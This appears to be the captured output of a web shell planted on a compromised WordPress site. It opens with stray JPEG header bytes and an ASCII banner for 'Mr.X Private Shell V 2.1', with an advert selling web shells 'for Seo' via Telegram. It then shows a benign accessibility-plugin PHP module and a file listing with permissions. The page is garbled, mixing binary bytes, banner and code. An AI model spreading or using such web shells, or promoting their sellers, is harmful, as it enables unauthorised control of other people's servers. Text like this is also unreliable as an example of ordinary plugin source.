����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace EA11y\Modules\Dashboard;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
use EA11y\Classes\Module_Base;
use EA11y\Modules\Dashboard\Widgets\Ally_Dashboard_Widget;
class Module extends Module_Base {
public function get_name(): string {
return 'dashboard';
}
/**
* Module constructor.
*/
public function __construct() {
// Add Ally dashboard widget
Ally_Dashboard_Widget::init();
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| widgets | Folder | 0755 |
|
|
| module.php | File | 441 B | 0644 |
|